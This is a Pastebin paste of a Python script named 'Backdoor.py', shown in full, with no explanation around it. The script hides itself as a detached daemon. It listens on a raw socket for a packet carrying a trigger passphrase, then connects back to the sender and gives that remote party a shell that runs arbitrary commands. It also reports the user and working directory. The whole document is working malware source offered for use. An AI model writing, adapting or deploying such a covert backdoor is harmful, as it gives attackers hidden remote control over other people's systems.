API tools faq
paste
Advertisement
WhichHat

Backdoor.py

WhichHat
Mar 24th, 2017
623
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.51 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python3
  2.  
  3. import socket
  4. import os
  5. import getpass
  6. import subprocess
  7. import platform
  8. import sys
  9. from struct import *
  10.  
  11.  
  12. def BackdoorGetSystemInfo(skt):
  13.     command = skt.recv(1024)
  14.     prompt = []
  15.     if type(command) == bytes:
  16.         command=command.decode("utf-8")
  17.     if command.strip() == "Report":
  18.         p = subprocess.Popen(['whoami'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  19.         out, err = p.communicate()
  20.         user = out.strip().decode("utf-8")
  21.         prompt.append(user+"@")
  22.         prompt.append(platform.dist()[0]+":")
  23.         separator = "$"
  24.         if user == "root":
  25.             separator = "#"
  26.         prompt.append(separator)
  27.         prompt = "".join(prompt)
  28.         skt.send(str.encode(prompt))
  29.     command = skt.recv(1024)
  30.     if type(command) == bytes:
  31.         command=command.decode("utf-8")
  32.     if command.strip() == "Location":
  33.         proc = os.popen("pwd")
  34.         location = ""
  35.         for i in proc.readlines():
  36.             location += i
  37.         location = location.strip()
  38.         skt.send(str.encode(location))
  39.     return
  40.  
  41.  
  42. def BackdoorCmd(skt, command):
  43.  
  44.     try:
  45.         proc = os.popen(command) # counterpart : can't have any error message
  46.         output = ""
  47.         for i in proc.readlines():
  48.             output += i
  49.         output = output.strip()
  50.         if output == "":
  51.             output = "daemonnoreport" #send this to avoid troublesome padding
  52.         skt.send(str.encode(output))
  53.         # Equivalent using subprocess but has trouble with chained commands
  54.     except Exception as err:
  55.         print(err.args)
  56.         skt.send(str.encode("Error : command '"+command+"' not found"))
  57.  
  58.  
  59. def BackdoorSniffer():
  60.     skt = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
  61.     while True:
  62.         pkt = skt.recvfrom(65535)
  63.         #packet string from tuple
  64.         pkt = pkt[0]
  65.         #take first 20 characters for the ip header
  66.         ipHeader = pkt[0:20]
  67.         #now unpack
  68.         iph = unpack('!BBHHHBBH4s4s' , ipHeader)
  69.         saddr = socket.inet_ntoa(iph[8])
  70.         daddr = socket.inet_ntoa(iph[9])
  71.         versionIhl = iph[0]
  72.         version = versionIhl >> 4
  73.         ihl = versionIhl & 0xF
  74.         iphLength = ihl*4
  75.         tcpHeader = pkt[iphLength:iphLength+20]
  76.         tcph = unpack('!HHLLBBHHH' , tcpHeader)
  77.         sport = tcph[0]
  78.         dport = tcph[1]
  79.         doffReserved = tcph[4]
  80.         tcphLength = doffReserved >> 4  
  81.         hSize = iphLength + tcphLength*4
  82.         dataSize = len(pkt) - hSize
  83.          
  84.         #get data from the packet
  85.         data = pkt[hSize:]
  86.         try:
  87.             if type(data) == bytes:
  88.                 data = data.decode("utf-8")
  89.             if data == "passphrase1":
  90.                 if type(saddr) == bytes:
  91.                     saddr = saddr.decode("utf-8")
  92.                 if type(sport) == bytes:
  93.                     sport = sport.decode("utf-8")
  94.                 return saddr, sport, daddr, dport
  95.         except:
  96.             pass
  97.  
  98. def BackdoorInit():
  99.  
  100.     skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  101.     daddr, dport, saddr, sport = BackdoorSniffer()
  102.     try:
  103.         skt.bind((saddr, sport))
  104.         skt.connect((daddr, dport))
  105.     except:
  106.         return None
  107.     command = skt.recv(1024)
  108.     if type(command)==bytes:
  109.         command=command.decode("utf-8")
  110.     if command.strip() == "passphrase2":
  111.         skt.send(b"passphrase3")
  112.        
  113.         return skt
  114.     else:
  115.         return None
  116.        
  117.  
  118. def BackdoorShell(skt):
  119.     while True:
  120.        
  121.         try:
  122.             command = skt.recv(1024)
  123.             if type(command)==bytes:
  124.                 command=command.decode("utf-8")
  125.             if command.strip().split()[0] == "cd":
  126.                 os.chdir(command.strip("cd "))
  127.                 BackdoorCmd(skt, "pwd")
  128.             elif command.strip().lower() == "exit":
  129.                 skt.send(b"exited")
  130.                 skt.close()
  131.                 break
  132.             elif command.strip().lower() == "release":
  133.                 skt.send(b"released")
  134.                 skt.close()
  135.                 return False
  136.             else:
  137.                 BackdoorCmd(skt, command)
  138.         except Exception:
  139.             skt.send(b"Error : An unexpected error has occurred.")
  140.        
  141.     return True
  142.  
  143.  
  144. def Backdoor():
  145.     while True:
  146.         skt = BackdoorInit()
  147.         if skt == None:
  148.             continue
  149.         BackdoorGetSystemInfo(skt)
  150.         if not BackdoorShell(skt):
  151.             break
  152.     return
  153.  
  154. def daemonize ():
  155.     stdin='/dev/null'
  156.     stdout='/dev/null'
  157.     stderr='/dev/null'
  158.     # Perform first fork.
  159.     try:
  160.         pid = os.fork()
  161.         if pid > 0:
  162.             sys.exit(0) # Exit first parent.
  163.     except OSError as e:
  164.         print(e.args)
  165.         sys.exit(1)
  166.     # Decouple from parent environment.
  167.     os.chdir("/")
  168.     os.umask(0)
  169.     os.setsid()
  170.     # Perform second fork.
  171.     try:
  172.         pid = os.fork( )
  173.         if pid > 0:
  174.             sys.exit(0) # Exit second parent.
  175.     except OSError as e:
  176.         print(e.args)
  177.         sys.exit(1)
  178.     # The process is now daemonized, redirect standard file descriptors.
  179.     for f in sys.stdout, sys.stderr:
  180.         f.flush( )
  181.     si = open(stdin, 'r')
  182.     so = open(stdout, 'a+')
  183.     se = open(stderr, 'a+')
  184.     os.dup2(si.fileno( ), sys.stdin.fileno( ))
  185.     os.dup2(so.fileno( ), sys.stdout.fileno( ))
  186.     os.dup2(se.fileno( ), sys.stderr.fileno( ))
  187.  
  188.     Backdoor()
  189.  
  190. daemonize()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!